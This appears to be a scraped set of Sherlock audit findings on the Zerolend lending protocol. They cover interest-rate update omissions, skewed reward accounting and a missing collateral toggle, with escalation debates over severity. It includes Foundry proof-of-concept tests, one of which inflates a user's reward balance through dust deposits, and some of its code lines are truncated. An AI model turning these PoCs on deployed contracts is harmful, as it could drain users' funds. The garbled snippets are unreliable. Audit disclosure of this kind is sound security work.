This can happen even if pool managers behave rationally (with good intentions) and can cause severe and irreversible damage to users before it's corrected. It's better to completely prevent the possibility of such cases as the chances of this happening is pretty high given the permissionless nature of pools.
If the pool manager did everything right, then there is no issue here. By default, he is the external admin and, by default, should do everything correctly. If not, it is a user mistake.
@nevillehuang explained it in the first comment.
My decision to reject the escalation remains.
@cvetanovv i appreciate the effort 🙏
Consider this. Alice creates a pool and decides to add the AML token to her pool and she also adds the chainlink AML/USD oracle to this pool.
From every perspective Alice has done everything right.
This cannot be grouped as user mistakes because user mistakes only hurt themselves, hence why they are invalid.
In this case Alice is a pool manager and this issue will affect all users of their pool not just Alice.
As I mentioned in previous comments I believe the chances of this happening is very high.
And it would be unfair to pool users to call it a user mistake.
@cvetanovv. how would a pool manager do everything right though? If he wants to create a pool for an asset that has a different amount of decimals in Chainlink, then this will always lead to an error. His only way of avoiding this is not creating a pool with such an asset which I don't believe is a fair reason to classify this as invalid.
@Honour-d-dev @samuraii77 I understand your points.
The protocol will use standard tokens, but some standard tokens may return a different price due to the lack of decimal scaling.
This means that the pool manager will not be able to use them, although it is mentioned in the readme that they can be used.
This means no working functionality because they will not be used because the pool manager has to act rationally, and using them will cause a bug - Medium severity.
I am planning to accept the escalation and make this issue Medium severity.
Has duplicates
Escalations have been resolved successfully!
Escalation status:
@cvetanovv those issues that dups with this issue are also valid or not ?
@coffiasd, the duplicates are also valid. Labels are added at the end after the escalations are over.
A2-security, Bigsam, Obsidian, iamnmt
A bug in Zerolend's withdrawal mechanism causes the interest rate to not be updated when funds are transferred to the treasury during a withdrawal. This failure leads to the next user encountering an inflated interest rate when performing subsequent actions like deposit, withdrawal or borrow before the rate is normalized again. The issue arises because the liquidity in the pool drops due to the funds being transferred to the treasury, but the system fails to update the interest rate to reflect this change.
Examples of update rate before transferring everywhere in the protocol to maintain Rate
The same process can be observed in Aave v 3.
Looking at the effect of updating rate
This rates are used to get the new index
No response
No response
In the current implementation of Zerolend, during a withdrawal, the protocol transfers a portion of the funds to the treasury. However, it does not update the interest rate before this transfer has being done for all transfers, leading to an inflated liquidity rate being used by the next user, particularly for deposits. This is problematic as the next user deposits/withdraws at a rate that is incorrectly high, causing them to receive fewer shares than they should.
In comparison, Aave mints shares to the treasury, which can later withdraw this funds like any other user.
Each withdrawal out of the contract in underlying asset in Aave updates the interest rate, ensuring the rates reflect the true liquidity available in the pool.
Zerolend's approach of transferring funds directly upon every user withdrawal fails to adjust the interest rate properly, resulting in a temporary discrepancy that affects subsequent users.
In the executeMintToTreasury
function, the accrued shares for the treasury are transferred, but the interest rates are not updated to account for the change in liquidity.
function executeMintToTreasury( DataTypes.ReserveSupplies storage totalSupply, mapping(address => DataTypes.ReserveData) storage reservesData, address treasury, address asset ) external { DataTypes.ReserveData storage reserve = reservesData[asset]; uint256 accruedToTreasuryShares = reserve.accruedToTreasuryShares; if (accruedToTreasuryShares != 0) { reserve.accruedToTreasuryShares = 0; uint256 normalizedIncome = reserve.getNormalizedIncome(); uint256 amountToMint = accruedToTreasuryShares.rayMul(normalizedIncome); @audit>> no interest rate update before fund removal >> IERC20(asset).safeTransfer(treasury, amountToMint); totalSupply.supplyShares -= accruedToTreasuryShares; emit PoolEventsLib.MintedToTreasury(asset, amountToMint); } }
As can be seen in this snippet, the funds are transferred to the treasury, but the function does not invoke any interest rate update mechanism. The liquidity in the pool decreases, but the next user's deposit will use an inflated rate due to this oversight.
In other parts of the code, such as during withdrawals, the interest rate is properly updated when liquidity changes:
function executeWithdraw( mapping(address => DataTypes.Res --------------------------------------- reserve.updateInterestRates( totalSupplies, cache, params.asset, IPool(params.pool).getReserveFactor(), 0, // No liquidity added params.amount, // Liquidity taken during withdrawal params.position, );
The updateInterestRates
function correctly calculates the new interest rate based on the changes in liquidity, ensuring the system uses accurate rates for subsequent operations.
Consider the following scenario:
Since the actual liquidity is lower than the interest rate assumes, the user depositing gets fewer shares than expected.
No response
The mitigation involves ensuring that the interest rate is properly updated before transferring funds to the treasury. The rate update should account for the liquidity being transferred out, ensuring the new rates reflect the actual available liquidity in the pool.
In the executeMintToTreasury
function, call the updateInterestRates
function before transferring the assets to the treasury. This will ensure that the interest rate reflects the updated liquidity in the pool before the funds are moved.
function executeMintToTreasury( DataTypes.ReserveSupplies storage totalSupply, mapping(address => DataTypes.ReserveData) storage reservesData, address treasury, address asset ) external { DataTypes.ReserveData storage reserve = reservesData[asset]; uint256 accruedToTreasuryShares = reserve.accruedToTreasuryShares; if (accruedToTreasuryShares != 0) { reserve.accruedToTreasuryShares = 0; uint256 normalizedIncome = reserve.getNormalizedIncome(); uint256 amountToMint = accruedToTreasuryShares.rayMul(normalizedIncome); ++ // Update the interest rates before transferring to the treasury ++ reserve.updateInterestRates( ++ totalSupply, ++ DataTypes.ReserveCache({}), // Supply necessary cache data ++ asset, ++ IPool(asset).getReserveFactor(), ++ 0, // No liquidity added ++ amountToMint, // Liquidity taken corresponds to amount sent to treasury ++ bytes32(0), // Position details (if any) ++ new bytes(0) // Interest rate data (if any) ++ ); IERC20(asset).safeTransfer(treasury, amountToMint); totalSupply.supplyShares -= accruedToTreasuryShares; emit PoolEventsLib.MintedToTreasury(asset, amountToMint); } }
In this updated version, the interest rates are recalculated to account for the liquidity sent to the treasury. This ensures that the next user's deposit uses a correctly updated interest rate.
1 comment(s) were left on this issue during the judging contest.
Honour commented:
Possibly valid. However claims the rates are inflated which i believe is false and the opposite happens( deflated rates) this is because the pool balance will be higher at the time interest rates are calculated (hence lower utilization and lower rates)
request poc
PoC requested from @Tomiwasa0
Requests remaining: 15
After setting Flashloan premium to 0.09%
Import to the WithdrawtTEST
++ import {IPool} from './../../../../contracts/interfaces/pool/IPool.sol'; ++ import {MockFlashLoanSimpleReceiver} from './../../../../contracts/mocks/MockSimpleFlashLoanReceiver.sol'; contract PoolWithdrawTests is PoolSetup { ++ address alice = address(1); ++ address bob = address(2); ++ event Transfer(address indexed from, address indexed to, uint256 value);
function \_generateFlashloanCondition() internal { // Mint and approve tokenA and tokenC for bob \_mintAndApprove(bob, tokenA, 60 ether, address(pool)); \_mintAndApprove(bob, tokenC, 2500 ether, address(pool)); // Start prank as bob to simulate transactions from bob's account vm.startPrank(bob); // Supply tokenC to the pool for bob pool.supplySimple(address(tokenC), bob, 1000 ether, 0); // Stop prank as bob vm.stopPrank(); }
### Updated testPoolWithdraw
function testPoolWithdraw() external { // Declare amounts for supply, mint, withdraw, and borrow uint256 supplyAmount = 60 ether; uint256 mintAmount = 150 ether; uint256 withdrawAmount = 10 ether; uint256 index = 1; uint256 borrowAmount = 20 ether; // Mint and approve tokenA for owner vm.startPrank(owner);, mintAmount); tokenA.approve(address(pool), supplyAmount); // Supply tokenA to the pool for owner pool.supplySimple(address(tokenA), owner, supplyAmount, index); // Assert the balances after supplying tokenA assertEq(tokenA.balanceOf(address(pool)), supplyAmount, 'Pool Balance Supply'); assertEq(tokenA.balanceOf(owner), mintAmount - supplyAmount, 'Owner Balance Supply'); assertEq(pool.getTotalSupplyRaw(address(tokenA)).supplyShares, supplyAmount); assertEq(pool.getBalanceRaw(address(tokenA), owner, index).supplyShares, supplyAmount); // Advance time by 100 seconds uint256 currentTime1 = block.timestamp; vm.warp(currentTime1 + 100); // Borrow tokenA pool.borrowSimple(address(tokenA), owner, borrowAmount, 1); assertEq(tokenA.balanceOf(address(pool)), supplyAmount - borrowAmount); assertEq(pool.getDebt(address(tokenA), owner, 1), borrowAmount); assertEq(pool.totalDebt(address(tokenA)), borrowAmount); vm.stopPrank(); // Advance time by 50 seconds uint256 currentTime2 = block.timestamp; vm.warp(currentTime2 + 50); // Prepare and execute flash loan bytes memory emptyParams; MockFlashLoanSimpleReceiver mockFlashSimpleReceiver = new MockFlashLoanSimpleReceiver(pool); \_generateFlashloanCondition(); uint256 premium = poolFactory.flashLoanPremiumToProtocol(); vm.startPrank(alice);, 10 ether); // Expect flash loan event emission vm.expectEmit(true, true, true, true); emit PoolEventsLib.FlashLoan(address(mockFlashSimpleReceiver), alice, address(tokenA), 40 ether, (40 ether * premium) / 10\_000); emit Transfer(address(0), address(mockFlashSimpleReceiver), (40 ether * premium) / 10\_000); // Execute the flash loan pool.flashLoanSimple(address(mockFlashSimpleReceiver), address(tokenA), 40 ether, emptyParams); vm.stopPrank(); // Advance time by 200 seconds uint256 currentTime = block.timestamp; vm.warp(currentTime + 200); // Assert the pool's balance after withdrawal assertEq(tokenA.balanceOf(address(pool)), 40036000000000000000, 'Pool Balance Withdraw'); // Withdraw tokenA from the pool for the owner vm.startPrank(owner); pool.withdrawSimple(address(tokenA), owner, withdrawAmount, index); // Advance time by 50 seconds uint256 currentTime3 = block.timestamp; vm.warp(currentTime3 + 50); // Assert the remaining balance after withdrawal assertEq(pool.getBalanceRaw(address(tokenA), owner, index).supplyShares, 50000001310612529086); // Bob mints and supplies more tokenA vm.startPrank(bob);, mintAmount); tokenA.approve(address(pool), supplyAmount); pool.supplySimple(address(tokenA), bob, 60 ether, index); // Assert the balance after Bob's supply assertEq(pool.getBalanceRaw(address(tokenA), bob, index).supplyShares, 59999989872672182169); }
Before Updating the index with Amount minted to tresury
Bob got - 59999989872672182169;
After update - 59999989869411349179,
Failing tests: Encountered 1 failing test in test/forge/core/pool/PoolWithdrawTests.t.sol:PoolWithdrawTests [FAIL. Reason: assertion failed: 59999989869411349179 != 59999989872672182169] testPoolWithdraw() (gas: 1531924) Encountered a total of 1 failing tests, 0 tests succeeded
000000, 0xNirix, A2-security, ether_sky, iamnmt
In NFTPositionManager
, users can deposit
or borrow
and earn rewards
in zero
However, the distribution of these rewards
is not working correctly.
Let's consider a pool
, P
, and an asset
, A
, with a current liquidity index
of 1.5
and U2
, each deposit
units of A
into pool
. (Think of U1
and U2
as token IDs
.)assetHash(P, A, false)
as H
function, the balance
is 100
, since it represents the asset amount
, not shares
(as seen in line 57
).function _supply(AssetOperationParams memory params) internal nonReentrant {, address(this), params.amount, params.tokenId,; 57: uint256 balance = pool.getBalance(params.asset, address(this), params.tokenId); _handleSupplies(address(pool), params.asset, params.tokenId, balance); }
for these users would be calculated as 100 ÷ 1.5 = 66.67 shares
each in the P
.Now, in the _handleSupplies
function, we compute the total supply
and balances
for these users for the assetHash
function _handleSupplies(address pool, address asset, uint256 tokenId, uint256 balance) internal { bytes32 _assetHash = assetHash(pool, asset, false); // H uint256 _currentBalance = _balances[tokenId][_assetHash]; // 0 _updateReward(tokenId, _assetHash); _balances[tokenId][_assetHash] = balance; // 100 _totalSupply[_assetHash] = _totalSupply[_assetHash] - _currentBalance + balance; }
Those values would be as below:
totalSupply[H] = 200
_balances[U1][H] = _balances[U2][H] = 100
liquidity index
increases to 2
, deposits
units of A
into the pool
makes a small withdrawal
of just 1 wei
to trigger an update to their balance
.Now, the total supply
and user balances
for assetHash
_balances[U1][H] = 100
_balances[U2][H] = 100 ÷ 1.5 × 2 = 133.3
_balances[U3][H] = 110
totalSupply[H] = 343.3
At this point, User U1
’s asset balance
in the pool P
is the largest, being 1 wei
more than U2
's and 23.3
more than U3
Yet, U1
receives the smallest rewards
because their balance
was never updated in the NFTPositionManager
In contrast, User U2
receives more rewards
due to the balance
update caused by withdrawing
just 1 wei
This system is unfair because:
, who has fewer assets
in the pool
than U1
, is receiving more rewards
distribution favors users who perform frequent updates (like deposits
o withdrawals
), which is not equitable.Instead of using the asset balance
as the rewards
basis, we should use the shares
in the pool
Here’s how the updated values would look:
_balances[U1][H] = 66.67
_balances[U2][H] = 66.67 - 1 wei
_balances[U3][H] = 110 ÷ 2 = 55
totalSupply[H] = 188.33
This way, the rewards
distribution becomes fair, as it is based on actual contributions to the pool
Manual Review
function _supply(AssetOperationParams memory params) internal nonReentrant {, address(this), params.amount, params.tokenId,; - uint256 balance = pool.getBalance(params.asset, address(this), params.tokenId); + uint256 balance = pool.getBalanceRaw(params.asset, address(this), params.tokenId).supplyShares; _handleSupplies(address(pool), params.asset, params.tokenId, balance); }
The same applies to the _borrow
, _withdraw
, and _repay
request poc
Is there a permisionless update functionality?
PoC requested from @etherSky111
Requests remaining: 25
Thanks for judging.
There is a clear issue.
To test this issue properly, we need to resolve the above issue first.
function getSupplyBalance(DataTypes.PositionBalance storage self, uint256 index) public view returns (uint256 supply) { - uint256 increase = self.supplyShares.rayMul(index) - self.supplyShares.rayMul(self.lastSupplyLiquidtyIndex); - return self.supplyShares + increase; - + return self.supplyShares.rayMul(index); }
Below is test code.
function supplyForUser(address user, uint256 supplyAmount, uint256 tokenId, bool mintNewToken) public { uint256 mintAmount = supplyAmount; DataTypes.ExtraData memory data = DataTypes.ExtraData(bytes(''), bytes('')); INFTPositionManager.AssetOperationParams memory params = INFTPositionManager.AssetOperationParams(address(tokenA), user, supplyAmount, tokenId, data); \_mintAndApprove(user, tokenA, mintAmount, address(nftPositionManager)); vm.startPrank(user); if (mintNewToken == true) {; }; vm.stopPrank(); } function borrowForUser(address user, uint256 borrowAmount, uint256 tokenId) public { DataTypes.ExtraData memory data = DataTypes.ExtraData(bytes(''), bytes('')); INFTPositionManager.AssetOperationParams memory params = INFTPositionManager.AssetOperationParams(address(tokenA), user, borrowAmount, tokenId, data); vm.startPrank(user); nftPositionManager.borrow(params); vm.stopPrank(); } function testRewardDistribution() external { DataTypes.ReserveData memory reserveData\_0 = pool.getReserveData(address(tokenA)); console2.log('initial liquidity index => ', reserveData\_0.liquidityIndex); address U1 = address(11); address U2 = address(12); address U3 = address(13); /** User U1 wants to mint a new NFT (tokenId = 1) and supply 100 ether token */ supplyForUser(U1, 100 ether, 1, true); /** User U2 wants to mint a new NFT (tokenId = 2) and supply 100 ether token */ supplyForUser(U2, 100 ether, 2, true); bytes32 assetHash = nftPositionManager.assetHash(address(pool), address(tokenA), false); uint256 balancesOfU1 = nftPositionManager.balanceOfByAssetHash(1, assetHash); uint256 balancesOfU2 = nftPositionManager.balanceOfByAssetHash(2, assetHash); console2.log('initial balance of U1 for rewards => ', balancesOfU1); console2.log('initial balance of U2 for rewards => ', balancesOfU2); /** For testing purposes, Alice mints a new NFT (tokenId = 3), supplies 1000 ether, and borrows 600 Ether. This action increases the pool's liquidity rate to a non-zero value. */ supplyForUser(alice, 1000 ether, 3, true); borrowForUser(alice, 600 ether, 3); DataTypes.ReserveData memory reserveData\_1 = pool.getReserveData(address(tokenA)); console2.log('current liquidity rate => ', reserveData\_1.liquidityRate); /** Skipping 2000 days is done for testing purposes to increase the liquidity index. In a real environment, the liquidity index would increase continuously over time. */ vm.warp(block.timestamp + 2000 days); pool.forceUpdateReserve(address(tokenA)); DataTypes.ReserveData memory reserveData\_2 = pool.getReserveData(address(tokenA)); console2.log('updated liquidity index => ', reserveData\_2.liquidityIndex); /** User U2 supplies 100 wei (a dust amount) to trigger an update of the balances for rewards. */ supplyForUser(U2, 100, 2, false); uint256 balancesOfU1Final = nftPositionManager.balanceOfByAssetHash(1, assetHash); uint256 balancesOfU2Final = nftPositionManager.balanceOfByAssetHash(2, assetHash); console2.log('final balance of U1 for rewards => ', balancesOfU1Final); console2.log('final balance of U2 for rewards => ', balancesOfU2Final); /** User U3 wants to mint a new NFT (tokenId = 4) and supply 110 ether token */ supplyForUser(U3, 110 ether, 4, true); uint256 balancesOfU3Final = nftPositionManager.balanceOfByAssetHash(4, assetHash); console2.log('final balance of U3 for rewards => ', balancesOfU3Final); }
Everything is in below log:
initial liquidity index => 1000000000000000000000000000 initial balance of U1 for rewards => 100000000000000000000 initial balance of U2 for rewards => 100000000000000000000 current liquidity rate => 43490566037735849056603774 updated liquidity index => 1238304471439648487981390542 final balance of U1 for rewards => 100000000000000000000 final balance of U2 for rewards => 123830447143964848898 final balance of U3 for rewards => 110000000000000000000
There is no reward system
that requires users to continuously update their balances
How can users realistically update their balances
every second to receive accurate rewards
Is this practical?
This issue does not meet Sherlock's criteria for a medium issue that requires the following:
Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained. The loss of the affected party must exceed 0.01% and 10 USD.
For this issue to cause a 0.01% loss there must be an unrealistic increase in the liquidityIndex in an extremely small 14 day period. The POC provided inflates the liquidity index by borrowing a 60% of the funds at a huge interest rate for 5.5 years, this is absolutely not realistic and will never happen.
This issue does not meet Sherlock's criteria for a medium issue that requires the following:
Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained. The loss of the affected party must exceed 0.01% and 10 USD.
For this issue to cause a 0.01% loss there must be an unrealistic increase in the liquidityIndex in an extremely small 14 day period. The POC provided inflates the liquidity index by borrowing a 60% of the funds at a huge interest rate for 5.5 years, this is absolutely not realistic and will never happen.
You've created a valid escalation!
To remove the escalation from consideration: Delete your comment.
You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.
This issue is a high severity bug:
per comment
per comment
You've created a valid escalation!
To remove the escalation from consideration: Delete your comment.
You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.
I think this issue can be of High severity.
The attack path described in #58 shows very well how a user can deposit 1 USDC every day and earn more rewards than a normal user.
To execute this attack, we have almost no restrictions( except the normal ones, to have a reward and interest rate above zero), and the losses exceed 1%.
Planning to accept @obou07 escalation and make this issue High.
@cvetanovv This issue has a severe constraint:
The other users must not update their position at all for an extended period of time (~4 months to create a 1% difference). This is an external constraint out of the control of the attacker. Furthermore, since a reward EPOCH lasts only 2 weeks it is likely that users will redeem rewards and then compound them back into their position, this totally protects them from the issue.
The intended design is for users to __NOT__ update their position, thus it is expected for users to not update their positions for prolonged periods of time. For that reason, the used word "constraint" is not quite correct, it is not a constraint, it is the expected scenario.
High severity states
Definite loss of funds without (extensive) limitations of external conditions. The loss of the affected party must exceed 1%.
What I described is an external condition (user does not update their position at all, for an extended period of time) that looks extensive to me. All it takes is for a user to supply/withdraw from their position once in a 4 month period to make this issue have very low impact.
That is a limitation but not an extensive one as I mentioned in my above comment - users have absolutely no reason to update their positions usually. The only reason people would update their position is due to the issue mentioned in this report which means that only a few users who have a good understanding of Solidity and a rather malicious mindset would update their positions.
Furthermore, it only takes 1 user not updating his position to cause a loss of funds.
It is ridiculous to say the only reason people will update their position is this issue. Users modify their positions for a multitude of reasons in DEFI (moving to a different pool with more yield, compounding rewards, etc).
As a normal DeFi user, will you update your position continuously?
All the user has to do is update their position once every few months.
@0xSpearmint is right. Most users are short-term investors(rather than long-term) who would update their positions more frequently. The chances of someone updating their position at least once every few months are huge and do not match the High severity rule, whereby there shall be no limitations.
My decision is to reject both escalations and leave this issue Medium severity.
Most users are short-term investors(rather than long-term) who would update their positions more frequently.
I think it is not fair to make that assumption. It is a subjective assumption. It is equally likely a user is a short-term investor or a long-term investor. The impact for the long-term investor satisfies the high severity requirement.
ALL investors (short term/ long term) are incentivised to compound rewards back into their positions ASAP to get a greater return.
Of course, the final decision is up to @cvetanovv and I don't want to argue.
But @0xSpearmint is thinking wrongly.
ALL investors (short term/ long term) are incentivised to compound rewards back into their positions ASAP to get a greater return.
Could you please let me know about any other reward system where stakers should update their positions repeatedly to get a correct rewards?
This is obviously a bug and there is no guarantee that all investers should update their positions ASAP to get a greater return.
As a long-term inversters, how do they know whether their rewards are calculated wrongly if they didn't update their positions?
Maybe the protocol notify to them?
I agree this is an issue. But it does not meet sherlock's strict criteria for high severity.
Here is sherlock's criteria for medium:
Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained.
This issue requires a specific external condition, the other users must not update their position at all for an extended period of time (4 months).
This is my last comment.
I agree this is an issue. But it does not meet sherlock's strict criteria for high severity.
Here is sherlock's criteria for medium:
Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained.
This issue requires a specific external condition, the other users must not update their position at all for an extended period of time (4 months).
This is not a specific external condition.
Imagine there are 100 stakers and are you sure that all these users update their positions in 4 months?
If I am a long term staker and I deposited large tokens to get ZERO
token rewards, I won't update my positions for a long period as I believe the rewards calculation is correct.
Unfortunately, there is an error in the rewards calculation and I will lose funds accidently.
But I think this is at most medium issue because this is my mistake to not update my positions accordingly.
I should've update my positions every 4 months.
And please stop arguing and let the judge decide.
This is the rule for High severity:
Definite loss of funds without (extensive) limitations of external conditions. The loss of the affected party must exceed 1%.
We only have a 1% loss if someone doesn't update their position for a few months. This is a serious limitation. To be High severity, there should be no limitation as written in the rule.
But it perfectly fits the Medium severity rule:
Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained. The loss of the affected party must exceed 0.01% and 10 USD.
My decision is to reject both escalations and leave this issue Medium severity.
Has duplicates
Escalations have been resolved successfully!
Escalation status:
0xc0ffEE, A2-security, almurhasan, tallo
Protocol users who manage their positions through the PositionManager
are not able to manage risk of their positions, by setting collateral to on and off. Which is a core functionality of every lending protocol. The missing functionality will doss users from withdrawing also in certain conditions.
For each collateral resrve the pool tracks whethere the user is using as collateral or not, this is set in the userConfigMap. Any user could set which reserve he is setting as collateral by calling the
function setUserUseReserveAsCollateral(address asset, uint256 index, bool useAsCollateral) external { _setUserUseReserveAsCollateral(asset, index, useAsCollateral); }
The PositionManager.sol which the protocol users, are expected to interact with, doesn't implement the setUserUseReserveAsCollateral(), which first of all leads to the inablity of protocol users to manage risk on their Positions.
The second impact and the most severe is that Position holders will be dossed, in the protocols if the ltv of one of the reserve token being used, will be set to zero. In such an event, users are required to set the affected collateral to false in order to do operations that lowers the ltv like withdraw to function.
The doss will be done in the function validateHFandLtv()
which will be called to check the health of a position is maintend after a withdrawal
function validateHFAndLtv( mapping(address => mapping(bytes32 => DataTypes.PositionBalance)) storage _balances, mapping(address => DataTypes.ReserveData) storage reservesData, mapping(uint256 => address) storage reservesList, DataTypes.UserConfigurationMap memory userConfig, DataTypes.ExecuteWithdrawParams memory params ) internal view { DataTypes.ReserveData memory reserve = reservesData[params.asset]; (, bool hasZeroLtvCollateral) = validateHealthFactor(_balances, reservesData, reservesList, userConfig, params.position, params.pool); @>> require(!hasZeroLtvCollateral || reserve.configuration.getLtv() == 0, PoolErrorsLib.LTV_VALIDATION_FAILED); }
In this case, if the user wants to withdraw other reserves that don't have 0 tlv, the transaction will revert.
Manual Review
Implement the missing functionality in the NFTPositionManager.sol
, to allow users to manage the risk on their NFTPosition
@nevillehuang The main impact here is that if an admin sets the ltv of a collateral to zero, then users withdrawals from the NFTPositionManager will be DoS'd. If this is valid, shouldn't #166 be valid? Since 166 was invalidated since it required admins to perform actions that lead to issues.
A2-security, Bigsam, almurhasan, dany.armstrong90, ether_sky, nfmelendez, trachev
A bug exists in the Zerolend liquidation process where the interest rate is not updated before transferring liquidation funds to the treasury. This omission leads to an inflated index being used by the next user when performing subsequent actions such as deposits, withdrawals, or borrowing, similar to the previously reported bug in the withdrawal function. As a result, the next user may receive fewer shares or incur an incorrect debt due to the artificially high liquidity rate.
Examples of update rate before transferring everywhere in the protocol to maintain Rate
The same process can be observed in Aave v 3.
Looking at the effect of updating rate
This rates are used to get the new index
No response
No response
During the liquidation process in Zerolend, when funds are transferred to the treasury as a liquidation protocol fee, the interest rate in the pool is not updated before the transfer. This failure results in the next user's interaction with the protocol (such as a deposit, withdrawal, or loan) being calculated based on an inflated liquidity rate. The inflated rate causes the user to receive fewer shares than they should or be charged an incorrect interest rate.
In contrast, Aave’s approach ensures that the interest rate is always updated when necessary and adjusted when funds are moved outside the system. Aave achieves this by transferring the funds inside the contract in the form of aTokens, which track liquidity changes, and since atokens are not burnt there is no need to update the interest rate accordingly in this case.
Zerolend, however, directly transfers funds out of the pool without recalculating the interest rate, which leads to inconsistencies in the index used by the next user.
In Zerolend's liquidation process, when a user is liquidated and the liquidation fee is sent to the treasury, the protocol transfers the funds directly without updating the interest rate.
// Transfer fee to treasury if it is non-zero if (vars.liquidationProtocolFeeAmount != 0) { uint256 liquidityIndex = collateralReserve.getNormalizedIncome(); uint256 scaledDownLiquidationProtocolFee = vars.liquidationProtocolFeeAmount.rayDiv(liquidityIndex); uint256 scaledDownUserBalance = balances[params.collateralAsset][params.position].supplyShares; if (scaledDownLiquidationProtocolFee > scaledDownUserBalance) { vars.liquidationProtocolFeeAmount = scaledDownUserBalance.rayMul(liquidityIndex); } @audit >> transferring underlying asset out without updating interest rate first>>>> IERC20(params.collateralAsset).safeTransfer(IPool(params.pool).factory().treasury(), vars.liquidationProtocolFeeAmount); }
As can be seen in the code, the liquidation protocol fee is transferred to the treasury, but no interest rate update takes place before the transfer. This results in an incorrect liquidity rate for the next user interaction.
Aave uses aTokens for transfers within the protocol, and the interest rate is updated accordingly when funds are moved, ensuring that the liquidity rate and index are always accurate. In Aave’s liquidation process, the aTokens are transferred to the treasury rather than removing liquidity directly from the pool.
vars.collateralAToken.transferOnLiquidation( params.user, vars.collateralAToken.RESERVE_TREASURY_ADDRESS(), vars.liquidationProtocolFeeAmount );
In Aave’s implementation, the aToken system ensures that the liquidity and interest rates are intact based on the movement of funds and not transferring underlying assets.
No response
To address this issue, the interest rate must be updated before transferring any liquidation protocol fees to the treasury. This ensures that the system correctly accounts for the reduction in liquidity due to the transfer. This will be my last report here before transferring funds to the treasury also a bug was discovered before transferring. kind fix also. thank you for the great opportunity to audit your code i wish zerolend the very best in the future.
In the liquidation logic, invoke the updateInterestRates
function on the collateral reserve before transferring the funds to the treasury. This will ensure that the correct liquidity rate is applied to the pool before the funds are removed.
if (vars.liquidationProtocolFeeAmount != 0) { uint256 liquidityIndex = collateralReserve.getNormalizedIncome(); uint256 scaledDownLiquidationProtocolFee = vars.liquidationProtocolFeeAmount.rayDiv(liquidityIndex); uint256 scaledDownUserBalance = balances[params.collateralAsset][params.position].supplyShares; if (scaledDownLiquidationProtocolFee > scaledDownUserBalance) { vars.liquidationProtocolFeeAmount = scaledDownUserBalance.rayMul(liquidityIndex); } ++ // Before transferring liquidation protocol fee to treasury, update the interest rates ++ collateralReserve.updateInterestRates( ++ totalSupplies, ++ collateralReserveCache, ++ params.collateralAsset, ++ IPool(params.pool).getReserveFactor(), ++ 0, // No liquidity added ++ vars.liquidationProtocolFeeAmount, // Liquidity taken during liquidation ++ params.position, ++ ++ ); ++ // Now, transfer fee to treasury if it is non-zero IERC20(params.collateralAsset).safeTransfer(IPool(params.pool).factory().treasury(), vars.liquidationProtocolFeeAmount); }
In this updated version, the interest rates are recalculated before the liquidation protocol fee is transferred to the treasury. This ensures that subsequent deposits, withdrawals, and loans use the correct liquidity rate and avoid discrepancies caused by an inflated index.
request poc
Seems related to #387 in terms of root cause
PoC requested from @Tomiwasa0
Requests remaining: 14
After setting liquidationProtocolFeePercentage to 20%, 20-10% using aave's examples
add to addresses
++ address sam = address(3); ++ address dav = address(4);
function \_generateLiquidationCondition() internal { \_mintAndApprove(alice, tokenA, mintAmountA, address(pool)); // alice 1000 tokenA \_mintAndApprove(sam, tokenA, mintAmountA, address(pool)); // alice 1000 tokenA \_mintAndApprove(bob, tokenB, mintAmountB, address(pool)); // bob 2000 tokenB \_mintAndApprove(dav, tokenA, mintAmountA, address(pool)); // bob 2000 tokenB vm.startPrank(alice); pool.supplySimple(address(tokenA), alice, supplyAmountA, 0); // 550 tokenA alice supply vm.stopPrank(); vm.startPrank(sam); pool.supplySimple(address(tokenA), sam, supplyAmountA, 0); // 550 tokenA alice supply vm.stopPrank(); vm.startPrank(bob); pool.supplySimple(address(tokenB), bob, supplyAmountB, 0); // 750 tokenB bob supply vm.stopPrank(); vm.startPrank(alice); pool.borrowSimple(address(tokenB), alice, borrowAmountB, 0); // 100 tokenB alice borrow vm.stopPrank(); vm.startPrank(sam); pool.borrowSimple(address(tokenB), sam, borrowAmountB, 0); // 100 tokenB alice borrow vm.stopPrank(); vm.startPrank(bob); pool.borrowSimple(address(tokenA), bob , 500e18, 0); // 100 tokenB alice borrow vm.stopPrank(); // Get the current block timestamp uint256 currentTime = block.timestamp; // Set the block.timestamp to current time plus 100 seconds vm.warp(currentTime + 1000); assertEq(tokenB.balanceOf(alice), borrowAmountB); oracleA.updateAnswer(0.45e8); }
Updated Liquidation Function:
function testLiquidationSimple2() external { \_generateLiquidationCondition(); (, uint256 totalDebtBase,,,,) = pool.getUserAccountData(alice, 0); vm.startPrank(bob); // vm.expectEmit(true, true, true, false); // emit PoolEventsLib.LiquidationCall(address(tokenA), address(tokenB), pos, 0, 0, bob); pool.liquidateSimple(address(tokenA), address(tokenB), pos, 100 ether); vm.stopPrank(); (, uint256 totalDebtBaseNew,,,,) = pool.getUserAccountData(alice, 0); assertTrue(totalDebtBase > totalDebtBaseNew); // Get the current block timestamp uint256 currentTime3 = block.timestamp; // Set the block.timestamp to current time plus 100 seconds vm.warp(currentTime3 + 500); vm.startPrank(dav); pool.supplySimple(address(tokenA), dav, 100e18, 0); // 550 tokenA alice supply vm.stopPrank(); assertEq(pool.getBalanceRaw(address(tokenA), dav, 0).supplyShares, 99999784100498438999); }
Before Updating the index with Amount minted to tresury
dav got - 99999784100498438999;
After update - 99999783033155331339,
Suite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 67.39ms (15.32ms CPU time) Ran 1 test suite in 2.36s (67.39ms CPU time): 0 tests passed, 1 failed, 0 skipped (1 total tests) Failing tests: Encountered 1 failing test in test/forge/core/pool/PoolLiquidationTests.t.sol:PoolLiquidationTest [FAIL. Reason: assertion failed: 99999783033155331339 != 99999784100498438999] testLiquidationSimple1() (gas: 1610672)
Other points are stated in issue 387
This issue is low severity. It does not satisfy the criteria for medium.
As shown by the POC, the difference in shares is 0.00000106% which is not large enough (0.01%) to be medium severity.
I agree with @0xSpearmint. This issue does not meet the criteria for Medium severity:
Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained. The loss of the affected party must exceed 0.01% and 10 USD.
I'm planning to invalidate the issue.
@cvetanovv ,
To get the full impact of this kindly apply the appropriate fix to the bugs discovered in the liquidation function issue 473 and others, this creates a scenario also almost similar to issue 199 attacker get free funds,
